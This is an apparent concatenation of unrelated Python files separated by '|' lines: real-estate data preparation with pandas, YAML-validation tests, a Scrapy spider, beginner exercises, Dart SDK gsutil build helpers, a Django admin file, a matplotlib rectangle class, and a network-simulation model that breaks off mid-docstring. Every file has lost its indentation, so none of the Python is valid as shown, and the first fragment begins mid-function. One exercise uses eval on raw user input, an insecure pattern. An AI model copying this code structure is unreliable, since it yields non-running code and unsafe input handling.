return pd.Series(d, index=[f"{year}_median", f"{year}_decile_1", f"{year}_decile_9"])
# will contain clean dfs mostly for ml
clean_df_list = []
# will contain yearly departement aggregated prices, dfs mostly for map generation
yearly_departement_prices_df_list = []
for year in range(2014, 2021):
with gzip.open(f'data/immobilier/transactions_raw/full{year}.csv.gz', 'rb') as f:
df = pd.read_csv(f)
# apply the desired preparation function
prepared_df = preparation_function(df)
# append the yearly prepared data to list of prepared dataframes
clean_df_list.append(prepared_df)
# aggregate data by departements by computing the median and deciles
aggregated_departement_price = prepared_df[["code_departement", "prix_m2"]].groupby(["code_departement"]).apply(custom_agg)
# append the yearly data to list of dataframes
yearly_departement_prices_df_list.append(aggregated_departement_price)
clean_df = pd.concat(clean_df_list, axis=0)
yearly_departement_prices_df = pd.concat(yearly_departement_prices_df_list, axis=1)
clean_df = clean_df.set_index("date_mutation")
clean_df.index = pd.to_datetime(clean_df.index)
return clean_df, yearly_departement_prices_df
def save_essential_data():
df_list = []
for year in range(2014, 2021):
with gzip.open(f'data/transactions_raw/full{year}.csv.gz', 'rb') as f:
df = pd.read_csv(f)
df_app = appartement_preparation(df)
print(df_app["code_departement"].unique().tolist())
df_list.append(df_app)
dfs = pd.concat(df_list)
dfs = dfs.set_index("date_mutation")
dfs.index = pd.to_datetime(dfs.index)
dfs.to_csv("data/immobilier/data_clean/appartements.csv")
if __name__ == "__main__":
# for year in range(2019, 2020):
# with gzip.open(f'data/immobilier/transactions_raw/full{year}.csv.gz', 'rb') as f:
# df = pd.read_csv(f)
# df = maison_preparation(df)
result1, result2 = data_work(maison_preparation)
result1.to_csv("data/immobilier/data_clean/maison.csv")
result2.to_csv("data/immobilier/data_clean/m2_maison_price_per_departement.csv")
|
"""
Tests for YAML file validation
"""
import sys
import os
from jsonschema import ValidationError
from codado import fromdir
from pytest import fixture, raises
from mock import patch
from yamlschema.lib import ValidateYAML
@fixture
def options():
options = ValidateYAML()
options['yamlSchema'] = fromdir(__file__)('test_config.schema.yml')
return options
@fixture
def configGood():
return fromdir(__file__)('test_config.yml')
@fixture
def configBad():
return fromdir(__file__)('test_config_bad.yml')
def test_postOptionsOk(options, configGood):
"""
Does a good config pass?
"""
options['yamlFile'] = configGood
pOut = patch.object(sys, 'stdout', autospec=True)
pErr = patch.object(sys, 'stderr', autospec=True)
with pOut, pErr:
x = options.postOptions()
assert x == True
def test_postOptionsBad(options, configBad):
"""
Does a bad config fail?
"""
pOut = patch.object(sys, 'stdout', autospec=True)
pErr = patch.object(sys, 'stderr', autospec=True)
options['yamlFile'] = configBad
with pOut, pErr:
raises(ValidationError, options.postOptions)
def test_parseArgs(options):
"""
Do we check permissions on files and report those errors?
"""
with patch.object(os, 'access', return_value=False):
raises(OSError, options.parseArgs, 'adafds', 'fdsa')
with patch.object(os, 'access', side_effect=[True, False]):
raises(OSError, options.parseArgs, 'adafds', 'fdsa')
with patch.object(os, 'access', return_value=True):
options.parseArgs('cheeses', 'meats')
assert options['yamlFile'] == 'cheeses'
assert options['yamlSchema'] == 'meats'
|
from scrapy.spiders import CrawlSpider
from scrapy_splash import SplashRequest
from search import luas
from search.items import SourceItem
from search.loaders import SearchLoader
class SourceCodeSpider(CrawlSpider):
name = 'source_code_spider'
# allowed_domains = ['search.com']
# start_urls = ['http://search.com/']
def __init__(self, *args, **kwargs):
# start_urls配置
start_urls = [kwargs.get('url')]
if start_urls:
self.start_urls = start_urls
# allowed_domains配置
# self.allowed_domains = config.get('allowed_domains')
super(SourceCodeSpider, self).__init__(*args, **kwargs)
def start_requests(self):
for url in self.start_urls:
print("进入首页")
print(url)
yield SplashRequest(url, callback=self.parse_item, endpoint='execute', args={'lua_source': luas.luaSimple, 'images': False})
def parse_item(self, response):
print(response.text)
loader = SearchLoader(item=SourceItem(), response=response)
loader.add_value('source', getattr(response, 'text'))
yield loader.load_item()
|
# no.1 定义在函数内部的变量拥有一个局部作用域,定义在函数外的拥有全局作用域
a=100
def show_f_l(a,b):
a=a+b
print (a)
return a
show_f_l(5,8)
print (a)
# no.2使用嵌套循环输出2~100之间的素数
|
#!/usr/bin/env python3
#
# Copyright (c) 2012, the Dart project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
import hashlib
import imp
import os
import subprocess
import sys
DART_DIR = os.path.abspath(
os.path.normpath(os.path.join(__file__, '..', '..', '..')))
def GetUtils():
'''Dynamically load the tools/utils.py python module.'''
return imp.load_source('utils', os.path.join(DART_DIR, 'tools', 'utils.py'))
SYSTEM_RENAMES = {
'win32': 'windows',
'windows': 'windows',
'win': 'windows',
'linux': 'linux',
'linux2': 'linux',
'lucid32': 'linux',
'lucid64': 'linux',
'darwin': 'macos',
'mac': 'macos',
'macos': 'macos',
}
ARCH_RENAMES = {
'ia32': 'ia32',
'x64': 'x64',
'arm': 'arm',
'arm64': 'arm64',
'riscv64': 'riscv64',
}
SYSTEM_TO_CIPD = {
'win32': 'windows',
'windows': 'windows',
'linux': 'linux',
'macos': 'mac',
}
ARCH_TO_CIPD = {
'ia32': '386',
'x64': 'amd64',
'arm': 'arm6l',
'arm64': 'arm64',
'riscv64': 'riscv64',
}
class Channel(object):
BETA = 'beta'
BLEEDING_EDGE = 'be'
DEV = 'dev'
STABLE = 'stable'
TRY = 'try'
INTEGRATION = 'integration'
ALL_CHANNELS = [BETA, BLEEDING_EDGE, DEV, STABLE, TRY, INTEGRATION]
class ReleaseType(object):
RAW = 'raw'
SIGNED = 'signed'
RELEASE = 'release'
ALL_TYPES = [RAW, SIGNED, RELEASE]
class Mode(object):
RELEASE = 'release'
DEBUG = 'debug'
ALL_MODES = [RELEASE, DEBUG]
class GCSNamer(object):
"""
This class is used for naming objects in our "gs://dart-archive/"
GoogleCloudStorage bucket. It's structure is as follows:
For every (channel,revision,release-type) tuple we have a base path:
gs://dart-archive/channels/{be,beta,dev,stable,try,integration}
/{raw,signed,release}/{revision,latest}/
Under every base path, the following structure is used:
- /VERSION
- /api-docs/dartdocs-gen-api.zip
- /sdk/dartsdk-{linux,macos,windows}-{ia32,x64}-release.zip
"""
def __init__(self,
channel=Channel.BLEEDING_EDGE,
release_type=ReleaseType.RAW,
internal=False):
assert channel in Channel.ALL_CHANNELS
assert release_type in ReleaseType.ALL_TYPES
self.channel = channel
self.release_type = release_type
if internal:
self.bucket = 'gs://dart-archive-internal'
else:
self.bucket = 'gs://dart-archive'
# Functions for querying complete gs:// filepaths
def version_filepath(self, revision):
return '%s/channels/%s/%s/%s/VERSION' % (self.bucket, self.channel,
self.release_type, revision)
def sdk_zipfilepath(self, revision, system, arch, mode):
return '/'.join([
self.sdk_directory(revision),
self.sdk_zipfilename(system, arch, mode)
])
def unstripped_filepath(self, revision, system, arch):
return '/'.join([
self._variant_directory('unstripped', revision), system, arch,
self.unstripped_filename(system)
])
def apidocs_zipfilepath(self, revision):
return '/'.join(
[self.apidocs_directory(revision),
self.dartdocs_zipfilename()])
# Functions for querying gs:// directories
def base_directory(self, revision):
return '%s/channels/%s/%s/%s' % (self.bucket, self.channel,
self.release_type, revision)
def sdk_directory(self, revision):
return self._variant_directory('sdk', revision)
def linux_packages_directory(self, revision):
return '/'.join([self._variant_directory('linux_packages', revision)])
def src_directory(self, revision):
return self._variant_directory('src', revision)
def apidocs_directory(self, revision):
return self._variant_directory('api-docs', revision)
def misc_directory(self, revision):
return self._variant_directory('misc', revision)
def _variant_directory(self, name, revision):
return '%s/%s' % (self.base_directory(revision), name)
# Functions for querying filenames
def dartdocs_zipfilename(self):
return 'dartdocs-gen-api.zip'
def sdk_zipfilename(self, system, arch, mode):
assert mode in Mode.ALL_MODES
return 'dartsdk-%s-%s-%s.zip' % (SYSTEM_RENAMES[system],
ARCH_RENAMES[arch], mode)
def unstripped_filename(self, system):
return 'dart.exe' if system.startswith('win') else 'dart'
class GCSNamerApiDocs(object):
def __init__(self, channel=Channel.BLEEDING_EDGE):
assert channel in Channel.ALL_CHANNELS
self.channel = channel
self.bucket = 'gs://dartlang-api-docs'
def dartdocs_dirpath(self, revision):
assert len('%s' % revision) > 0
if self.channel == Channel.BLEEDING_EDGE:
return '%s/gen-dartdocs/builds/%s' % (self.bucket, revision)
return '%s/gen-dartdocs/%s/%s' % (self.bucket, self.channel, revision)
def docs_latestpath(self, revision):
assert len('%s' % revision) > 0
return '%s/channels/%s/latest.txt' % (self.bucket, self.channel)
def run(command, env=None, shell=False, throw_on_error=True):
print("Running command: ", command)
p = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
shell=shell,
universal_newlines=True)
(stdout, stderr) = p.communicate()
if throw_on_error and p.returncode != 0:
print("Failed to execute '%s'. Exit code: %s." %
(command, p.returncode),
file=sys.stderr)
print("stdout: ", stdout, file=sys.stderr)
print("stderr: ", stderr, file=sys.stderr)
raise Exception("Failed to execute %s." % command)
return (stdout, stderr, p.returncode)
class GSUtil(object):
GSUTIL_PATH = None
USE_DART_REPO_VERSION = False
def _layzCalculateGSUtilPath(self):
if not GSUtil.GSUTIL_PATH:
dart_gsutil = os.path.join(DART_DIR, 'third_party', 'gsutil',
'gsutil')
if os.path.isfile(dart_gsutil):
GSUtil.GSUTIL_PATH = dart_gsutil
elif GSUtil.USE_DART_REPO_VERSION:
raise Exception("Dart repository version of gsutil required, "
"but not found.")
else:
# We did not find gsutil, look in path
possible_locations = list(os.environ['PATH'].split(os.pathsep))
for directory in possible_locations:
location = os.path.join(directory, 'gsutil')
if os.path.isfile(location):
GSUtil.GSUTIL_PATH = location
break
assert GSUtil.GSUTIL_PATH
def execute(self, gsutil_args):
self._layzCalculateGSUtilPath()
gsutil_command = [sys.executable, GSUtil.GSUTIL_PATH]
return run(gsutil_command + gsutil_args)
def upload(self,
local_path,
remote_path,
recursive=False,
multithread=False):
assert remote_path.startswith('gs://')
if multithread:
args = ['-m', 'cp']
else:
args = ['cp']
if recursive:
args += ['-R']
args += [local_path, remote_path]
self.execute(args)
def cat(self, remote_path):
assert remote_path.startswith('gs://')
args = ['cat', remote_path]
(stdout, _, _) = self.execute(args)
return stdout
def setGroupReadACL(self, remote_path, group):
args = ['acl', 'ch', '-g', '%s:R' % group, remote_path]
self.execute(args)
def setContentType(self, remote_path, content_type):
args = ['setmeta', '-h', 'Content-Type:%s' % content_type, remote_path]
self.execute(args)
def remove(self, remote_path, recursive=False):
assert remote_path.startswith('gs://')
args = ['rm']
if recursive:
args += ['-R']
args += [remote_path]
self.execute(args)
def GetChannelFromName(name):
"""Get the channel from the name. Bleeding edge builders don't
have a suffix."""
channel_name = name.split('-').pop()
if channel_name in Channel.ALL_CHANNELS:
return channel_name
return Channel.BLEEDING_EDGE
|
import unittest
from katas.kyu_8.player_rank_up import playerRankUp
class PlayerRankUpTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(playerRankUp(180),
'Well done! You have advanced to the qualifying sta'
'ge. Win 2 out of your next 3 games to rank up.')
def test_false(self):
self.assertFalse(playerRankUp(64))
|
# EXERCISE_6 WORK OF THE BOOK :
num = eval(input("Enter the number User's = "))
print("one Multiple of the User's number = ",1*num,sep="---",end="")
print("two Multiple of the User's number = ",2*num,sep="---",end="")
print("three Multiple of the User's number = ",3*num,sep="---",end="")
print("fourth Multiple of the User's number = ",4*num,sep="---",end="")
print("fiveth Multiple of the User's number = ",5*num,sep="---",end="")
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
# from django.contrib.auth.models import User
from talenthub.models import *
admin.site.register(Offer)
admin.site.register(Category)
admin.site.register(Meeting)
admin.site.register(Profile)
admin.site.register(Argument)
admin.site.register(Review)
|
import numpy as np
from matplotlib.patches import Rectangle
from .point import Point
""" Recangle object from the matplotlib object, with more attributes and methods
"""
class CustomRectangle(Rectangle):
def __init__(self, point, width, height, **kwargs):
self.point = point # lower corner
self.width = width
self.height = height
self.corners = None
super(CustomRectangle, self).__init__((point.x, point.y), width, height, **kwargs)
def data(self):
return (self.point, self.width, self.height)
def get_corners(self):
""" Compute corners and return it
"""
if self.corners is not None:
return self.corners
point = self.point
width = self.width
height = self.height
xx = [point.x, point.x + width]
yy = [point.y, point.y + height]
keys = [
"bot_left",
"bot_right",
"top_left",
"top_right"
]
points = np.dstack(np.meshgrid(xx, yy)).reshape(-1, 2)
vals = list(map(lambda pt: Point(pt[0], pt[1]), points))
self.corners = dict(zip(keys, vals))
return self.corners
def setFig(self, figure):
self.figure = figure
|
"""
A class that defines the network being modeled and that contains all
modeled objects in the network such as Nodes, Interfaces, Circuits,
and Demands.
Allows a single connection (Circuit) between layer3 Nodes. If multiple
Circuits between Nodes is needed, use Parallel_Link_Model object.
This Model object will generally perform better than Parallel_Model_Object due
to the latter's requirement to check for multiple Circuits between Nodes.
"""
from pprint import pprint
import networkx as nx
from .circuit import Circuit
from .interface import Interface
from .exceptions import ModelException
from .master_model import MasterModel
from .utilities import find_end_index
from .node import Node
from .rsvp import RSVP_LSP
from .srlg import SRLG
# TODO - call to analyze model for Unrouted LSPs and LSPs not on shortest path
# TODO - add simulation summary output with # failed nodes, interfaces, srlgs, unrouted lsp/demands,
# routed lsp/demands in dict form
# TODO - look at removing the requirement that Interface circuit_id be specified since the remote side
# can be determined because only one circuit can exist between any pair of Nodes
# TODO - add support for SRLGs in load_model_file
# TODO - add attribute for Node/Interface whereby an object can be failed by itself
# and not unfail when a parent SRLG unfails
class Model(MasterModel):
"""A network model object consisting of the following base components:
- Interface objects (set): layer 3 Node interfaces. Interfaces have a
'capacity' attribute that determines how much traffic it can carry.
Note: Interfaces are matched into Circuit objects based on the
interface circuit_ids --> A pair of Interfaces with the same circuit_id
value get matched into a Circuit
- Node objects (set): vertices on the network (aka 'layer 3 devices')
that contain Interface objects. Nodes are connected to each other
via a pair of matched Interfaces (Circuits)
- Demand objects (set): traffic loads on the network. Each demand starts
from a source node and transits the network to a destination node.
A demand also has a magnitude, representing how much traffic it
is carrying. The demand's magnitude will apply against each
interface's available capacity
- RSVP LSP objects (set): RSVP LSPs in the Model
- Circuit objects are created by matching Interface objects
"""
def __init__(self, interface_objects=set(), node_objects=set(),
demand_objects=set(), rsvp_lsp_objects=set()):
self.interface_objects = interface_objects
self.node_objects = node_objects
self.demand_objects = demand_objects
self.circuit_objects = set()
self.rsvp_lsp_objects = rsvp_lsp_objects
self.srlg_objects = set()
self._parallel_lsp_groups = {}
super().__init__(interface_objects, node_objects, demand_objects, rsvp_lsp_objects)
def __repr__(self):
return 'Model(Interfaces: %s, Nodes: %s, Demands: %s, RSVP_LSPs: %s)' % (len(self.interface_objects),
len(self.node_objects),
len(self.demand_objects),
len(self.rsvp_lsp_objects))
def add_network_interfaces_from_list(self, network_interfaces):
"""
A tool that reads network interface info and updates an *existing* model.
Intended to be used from CLI/interactive environment
Interface info must be a list of dicts and in format like below example:
network_interfaces = [
{'name':'A-to-B', 'cost':4,'capacity':100, 'node':'A',
'remote_node': 'B', 'circuit_id': 1, 'failed': False},
{'name':'A-to-Bv2', 'cost':40,'capacity':150, 'node':'A',
'remote_node': 'B', 'circuit_id': 2, 'failed': False},
{'name':'A-to-C', 'cost':1,'capacity':200, 'node':'A',
'remote_node': 'C', 'circuit_id': 3, 'failed': False},]
"""
new_interface_objects, new_node_objects = \
self._make_network_interfaces(network_interfaces)
self.node_objects = self.node_objects.union(new_node_objects)
self.interface_objects = \
self.interface_objects.union(new_interface_objects)
self.validate_model()
def validate_model(self):
"""
Validates that data fed into the model creates a valid network model
"""
# create circuits table, flags ints that are not part of a circuit
circuits = self._make_circuits(return_exception=True)
# Make dict to hold interface data, each entry has the following
# format:
# {'lsps': [], 'reserved_bandwidth': 0}
int_info = self._make_int_info_dict()
# Interface reserved bandwidth error sets
int_res_bw_too_high = set([])
int_res_bw_sum_error = set([])
error_data = [] # list of all errored checks
for interface in (interface for interface in self.interface_objects): # pragma: no cover
self._reserved_bw_error_checks(int_info, int_res_bw_sum_error, int_res_bw_too_high, interface)
# If creation of circuits returns a dict, there are problems
if isinstance(circuits, dict): # pragma: no cover
error_data.append({'ints_w_no_remote_int': circuits['data']})
# Append any failed checks to error_data
if len(int_res_bw_too_high) > 0: # pragma: no cover
error_data.append({'int_res_bw_too_high': int_res_bw_too_high})
if len(int_res_bw_sum_error) > 0: # pragma: no cover
error_data.append({'int_res_bw_sum_error': int_res_bw_sum_error})
# Validate there are no duplicate interfaces
unique_interfaces_per_node = self._unique_interface_per_node()
# Log any duplicate interfaces on a node
if not unique_interfaces_per_node: # pragma: no cover
error_data.append(unique_interfaces_per_node)
# Make validate_model() check for matching failed statuses
# on the interfaces and matching interface capacity
circuits_with_mismatched_interface_capacity = []
for ckt in (ckt for ckt in self.circuit_objects):
self._validate_circuit_interface_capacity(circuits_with_mismatched_interface_capacity, ckt)
if len(circuits_with_mismatched_interface_capacity) > 0:
int_status_error_dict = {
'circuits_with_mismatched_interface_capacity':
circuits_with_mismatched_interface_capacity
}
error_data.append(int_status_error_dict)
# Look for multiple links between nodes (not allowed in Model)
if len(self.multiple_links_between_nodes()) > 0:
multiple_links_between_nodes = {}
multiple_links_between_nodes['multiple links between nodes detected; not allowed in Model object'
'(use Parallel_Link_Model)'] = self.multiple_links_between_nodes()
error_data.append(multiple_links_between_nodes)
srlg_errors = self.validate_srlg_nodes()
if len(srlg_errors) > 0:
error_data.append(srlg_errors)
# Verify no duplicate nodes
node_names = set([node.name for node in self.node_objects])
if (len(self.node_objects)) != (len(node_names)): # pragma: no cover
node_dict = {'len_node_objects': len(self.node_objects),
'len_node_names': len(node_names)}
error_data.append(node_dict)
# Read error_data
if len(error_data) > 0:
message = 'network interface validation failed, see returned data'
pprint(message)
pprint(error_data)
raise ModelException((message, error_data))
else:
return self
def validate_srlg_nodes(self):
"""
Validate that Nodes in each SRLG have the SRLG in their srlgs set.
srlg_errors is a dict of node names as keys and a list of SRLGs that node is
a member of in the model but that the SRLG is not in node.srlgs
:return: dict where keys are Node names and values are lists of SRLG names;
each value will be a single list of SRLG names missing that Node in the
SRLG node set
"""
srlg_errors = {}
for srlg in self.srlg_objects: # pragma: no cover # noqa # TODO - perhaps cover this later in unit testing
nodes_in_srlg_but_srlg_not_in_node_srlgs = [node for node in srlg.node_objects if srlg not in node.srlgs]
for node in nodes_in_srlg_but_srlg_not_in_node_srlgs:
try:
srlg_errors[node.name].append(srlg.name)
except KeyError:
srlg_errors[node.name] = []
return srlg_errors
def update_simulation(self):
"""
Updates the simulation state; this needs to be run any time there is
a change to the state of the Model, such as failing an interface, adding
a Demand, adding/removing and LSP, etc.
This call does not carry forward any state from the previous simulation
results.
"""
self._parallel_lsp_groups = {} # Reset the attribute
# This set of interfaces can be used to route traffic
non_failed_interfaces = set()
# This set of nodes can be used to route traffic
available_nodes = set()
# Find all the non-failed interfaces in the model and
# add them to non_failed_interfaces.
# If the interface is not failed, then by definition, the nodes are
# not failed
for interface_object in (interface_object for interface_object in self.interface_objects
if interface_object.failed is not True):
non_failed_interfaces.add(interface_object)
available_nodes.add(interface_object.node_object)
available_nodes.add(interface_object.remote_node_object)
# Create a model consisting only of the non-failed interfaces and
# corresponding non-failed (available) nodes
non_failed_interfaces_model = Model(non_failed_interfaces,
available_nodes, self.demand_objects,
self.rsvp_lsp_objects)
# Reset the reserved_bandwidth, traffic on each interface
for interface in (interface for interface in self.interface_objects):
interface.reserved_bandwidth = 0
interface.traffic = 0
for lsp in (lsp for lsp in self.rsvp_lsp_objects):
lsp.path = 'Unrouted'
for demand in (demand for demand in self.demand_objects):
demand.path = 'Unrouted'
print("Routing the LSPs . . . ")
# Route the RSVP LSPs
self = self._route_lsps(non_failed_interfaces_model)
print("LSPs routed (if present); routing demands now . . .")
# Route the demands
self = self._route_demands(self.demand_objects,
non_failed_interfaces_model)
print("Demands routed; validating model . . . ")
self.validate_model()
def _make_circuits(self, return_exception=True, include_failed_circuits=True):
"""
Matches interface objects into circuits and returns the circuits list
:param return_exception: Should an exception be returned if not all the
interfaces can be matched into a circuit?
:param include_failed_circuits: Should circuits that will be in a
failed state be created?
:return: a set of Circuit objects in the Model, each Circuit
comprised of two Interface objects
"""
G = self._make_weighted_network_graph(include_failed_circuits=include_failed_circuits)
# Determine which interfaces pair up into good circuits in G
paired_interfaces = ((local_node_name, remote_node_name, data) for
(local_node_name, remote_node_name, data) in
G.edges(data=True) if G.has_edge(remote_node_name,
local_node_name))
# Set interface object in_ckt = False and baseline the circuit_id
for interface in (interface for interface in self.interface_objects):
interface.in_ckt = False
circuit_id_number = 1
circuits = set([])
# Using the paired interfaces (source_node, dest_node) pairs from G,
# get the corresponding interface objects from the model to create
# the circuit object
for interface in (interface for interface in paired_interfaces):
# Get each interface from model for each
int1 = self.get_interface_object_from_nodes(interface[0],
interface[1])
int2 = self.get_interface_object_from_nodes(interface[1],
interface[0])
if int1.in_ckt is False and int2.in_ckt is False:
# Mark interface objects as in_ckt = True
int1.in_ckt = True
int2.in_ckt = True
# Add circuit_id to interface objects
int1.circuit_id = circuit_id_number
int2.circuit_id = circuit_id_number
circuit_id_number = circuit_id_number + 1
ckt = Circuit(int1, int2)
circuits.add(ckt)
# Find any interfaces that don't have counterpart
exception_ints_not_in_ckt = [(local_node_name, remote_node_name, data)
for (local_node_name, remote_node_name, data) in
G.edges(data=True) if not (G.has_edge(remote_node_name, local_node_name))]
if len(exception_ints_not_in_ckt) > 0:
exception_msg = ('WARNING: These interfaces were not matched '
'into a circuit {}'.format(exception_ints_not_in_ckt))
if return_exception:
raise ModelException(exception_msg)
else:
return {'data': exception_ints_not_in_ckt}
self.circuit_objects = circuits
def get_interface_object_from_nodes(self, local_node_name, remote_node_name):
"""Returns an Interface object with the specified local and
remote node names """
for interface in (interface for interface in self.interface_objects):
if interface.node_object.name == local_node_name and \
interface.remote_node_object.name == remote_node_name:
return interface
def add_circuit(self, node_a_object, node_b_object, node_a_interface_name,
node_b_interface_name, cost_intf_a=1, cost_intf_b=1,
capacity=1000, failed=False, circuit_id=None):
"""
Creates component Interface objects for a new Circuit in the Model.
The Circuit object will then be created during the validate_model() call.
:param node_a_object: Node object
:param node_b_object: Node object
:param node_a_interface_name: name of component Interface on node_a
:param node_b_interface_name: name of component Interface on node_b
:param cost_intf_a: metric/cost of node_a_interface component Interface
:param cost_intf_b: metric/cost of node_b_interface component Interface
:param capacity: Circuit's capacity
:param failed: Should the Circuit be created in a Failed state?
:param circuit_id: Optional. Will be auto-assigned unless specified
:return: Model with new Circuit comprised of 2 new Interfaces
"""
if circuit_id is None:
circuit_ids = self.all_interface_circuit_ids
if len(circuit_ids) == 0:
circuit_id = 1
else:
circuit_id = max(circuit_ids) + 1
int_a = Interface(node_a_interface_name, cost_intf_a, capacity,
node_a_object, node_b_object, circuit_id)
int_b = Interface(node_b_interface_name, cost_intf_b, capacity,
node_b_object, node_a_object, circuit_id)
existing_int_keys = set([interface._key for interface in self.interface_objects])
if int_a._key in existing_int_keys:
raise ModelException("interface {} on node {} already exists in model".format(int_a, node_a_object))
elif int_b._key in existing_int_keys:
raise ModelException("interface {} on node {} already exists in model".format(int_b, node_b_object))
self.interface_objects.add(int_a)
self.interface_objects.add(int_b)
self.validate_model()
def is_node_an_orphan(self, node_object):
"""Determines if a node is in orphan_nodes"""
if node_object in self.get_orphan_node_objects():
return True
else:
return False
def get_orphan_node_objects(self):
"""
Returns list of Nodes that have no interfaces
"""
orphan_nodes = [node for node in self.node_objects if len(node.interfaces(self)) == 0]
return orphan_nodes
def add_node(self, node_object):
"""
Adds a node object to the model object
"""
if node_object.name in (node.name for node in self.node_objects):
message = "A node with name {} already exists in the model".format(node_object.name)
raise ModelException(message)
else:
self.node_objects.add(node_object)
self.validate_model()
def get_node_object(self, node_name):
"""
Returns a Node object, given a node's name
"""
matching_node = [node for node in self.node_objects if node.name == node_name]
if len(matching_node) > 0:
return matching_node[0]
else:
message = "No node with name %s exists in the model" % node_name
raise ModelException(message)
def _make_network_interfaces(self, interface_info_list):
"""
Returns set of Interface objects and a set of Node objects for Nodes
that are not already in the Model.
:param interface_info_list: list of dicts with interface specs;
:return: Set of Interface objects and set of Node objects for the
new Interfaces for Nodes that are not already in the model
"""
network_interface_objects = set([])
network_node_objects = set([])
# Create the Interface objects
for interface in interface_info_list:
intf = Interface(interface['name'], interface['cost'],
interface['capacity'], Node(interface['node']),
Node(interface['remote_node']),
interface['circuit_id'])
network_interface_objects.add(intf)
# Check to see if the Interface's Node already exists, if not, add it
node_names = ([node.name for node in self.node_objects])
if interface['node'] not in node_names:
network_node_objects.add(Node(interface['node']))
if interface['remote_node'] not in node_names:
network_node_objects.add(Node(interface['remote_node']))
return (network_interface_objects, network_node_objects)
def add_rsvp_lsp(self, source_node_name, dest_node_name, name):
"""
Adds an RSVP LSP with name from the source node to the
dest node and validates model.
:param source_node_name: LSP source Node name
:param dest_node_name: LSP destination Node name
:param name: name of LSP
:return: A validated Model with the new RSVP_LSP object
"""
source_node_object = self.get_node_object(source_node_name)
dest_node_object = self.get_node_object(dest_node_name)
added_lsp = RSVP_LSP(source_node_object, dest_node_object, name)
if added_lsp._key in set([lsp._key for lsp in self.rsvp_lsp_objects]):
message = '{} already exists in rsvp_lsp_objects'.format(added_lsp)
raise ModelException(message)
self.rsvp_lsp_objects.add(added_lsp)
self.validate_model()
def get_demand_object(self, source_node_name, dest_node_name, demand_name='none'):
"""
Returns demand specified by the source_node_name, dest_node_name, name;
throws exception if demand not found
"""
model_demand_iterator = (demand for demand in self.demand_objects)
demand_to_return = None
for demand in model_demand_iterator:
if demand.source_node_object.name == source_node_name and \
demand.dest_node_object.name == dest_node_name and \
demand.name == demand_name:
demand_to_return = demand
return demand_to_return
if demand_to_return is None:
raise ModelException('no matching demand')
def get_rsvp_lsp(self, source_node_name, dest_node_name, lsp_name='none'):
"""
Returns the RSVP LSP from the model with the specified source node
name, dest node name, and LSP name.
:param source_node_name: name of source node for LSP
:param dest_node_name: name of destination node for LSP
:param lsp_name: name of LSP
:return: RSVP_LSP object
"""
needed_key = (source_node_name, dest_node_name, lsp_name)
if needed_key not in (lsp._key for lsp in self.rsvp_lsp_objects):
msg = ("LSP with source node %s, dest node %s, and name %s "
"does not exist in model" % (source_node_name, dest_node_name, lsp_name))
raise ModelException(msg)
else:
for lsp in (lsp for lsp in self.rsvp_lsp_objects):
if lsp._key == needed_key:
return lsp
# Interface calls
def get_interface_object(self, interface_name, node_name):
"""Returns an interface object for specified node name and interface name"""
self._does_interface_exist(interface_name, node_name)
node_object = self.get_node_object(node_name)
int_object = [interface for interface in node_object.interfaces(self) if interface.name == interface_name]
return int_object[0]
def _does_interface_exist(self, interface_name, node_object_name):
int_key = (interface_name, node_object_name)
interface_key_iterator = (interface._key for interface in
self.interface_objects)
if int_key not in (interface_key_iterator):
raise ModelException('specified interface does not exist')
def get_circuit_object_from_interface(self, interface_name, node_name):
"""
Returns a Circuit object, given a Node name and Interface name
"""
# Does interface exist?
self._does_interface_exist(interface_name, node_name)
interface = self.get_interface_object(interface_name, node_name)
ckts = [ckt for ckt in self.circuit_objects if interface in (ckt.interface_a, ckt.interface_b)]
return ckts[0]
# Convenience calls #####
def get_failed_interface_objects(self):
"""
Returns a list of all failed interfaces in the Model
"""
failed_interfaces = []
for interface in (interface for interface in self.interface_objects):
if interface.failed:
failed_interfaces.append(interface)
return failed_interfaces
def get_unfailed_interface_objects(self):
"""
Returns a list of all non-failed interfaces in the Model
"""
unfailed_interface_objects = set()
interface_iter = (interface for interface in self.interface_objects)
for interface in interface_iter:
if not interface.failed:
unfailed_interface_objects.add(interface)
return unfailed_interface_objects
def get_unrouted_demand_objects(self):
"""
Returns list of demand objects that cannot be routed
"""
unrouted_demands = []
for demand in (demand for demand in self.demand_objects):
if demand.path == "Unrouted":
unrouted_demands.append(demand)
return unrouted_demands
def change_interface_name(self, node_name,
current_interface_name,
new_interface_name):
"""Changes interface name"""
interface_to_edit = self.get_interface_object(current_interface_name, node_name)
interface_to_edit.name = new_interface_name
return interface_to_edit
def fail_interface(self, interface_name, node_name):
"""Fails the Interface object for the interface_name/node_name pair"""
# Get the interface object
interface_object = self.get_interface_object(interface_name, node_name)
# Does interface exist?
if interface_object not in self.interface_objects:
ModelException('specified interface does not exist')
# find the remote interface
remote_interface_object = interface_object.get_remote_interface(self)
remote_interface_object.failed = True
interface_object.failed = True
def unfail_interface(self, interface_name, node_name, raise_exception=False):
"""
Unfails the Interface object for the interface_name, node_name pair.
:param interface_name:
:param node_name:
:param raise_exception: If raise_excecption=True, an exception
will be raised if the interface cannot be unfailed.
An example of this would be if you tried to unfail
the interface when the parent node or remote node
was in a failed state
:return: Interface object from Model that is not failed
"""
if not (isinstance(raise_exception, bool)):
message = "raise_exception must be boolean value"
raise ModelException(message)
# Get the interface object
interface_object = self.get_interface_object(interface_name, node_name)
# Does interface exist?
if interface_object not in set(self.interface_objects):
ModelException('specified interface does not exist')
# Find the remote interface
remote_interface = interface_object.get_remote_interface(self)
# Ensure local and remote nodes are failed == False and set reservable
# bandwidth on each interface to interface.capacity
if self.get_node_object(interface_object.node_object.name).failed is False and \
self.get_node_object(remote_interface.node_object.name).failed is False:
remote_interface.failed = False
remote_interface.reserved_bandwidth = 0
interface_object.failed = False
interface_object.reserved_bandwidth = 0
self.validate_model()
else:
if raise_exception:
message = ("Local and/or remote node are failed; cannot have "
"unfailed interface on failed node.")
raise ModelException(message)
def get_all_paths_reservable_bw(self, source_node_name, dest_node_name, include_failed_circuits=True,
cutoff=10, needed_bw=0):
"""
For a source and dest node name pair, find all simple path(s) with at
least needed_bw reservable bandwidth available less than or equal to
cutoff hops long.
The amount of simple paths (paths that don't have repeating nodes) can
be very large for larger topologies and so this call can be very expensive.
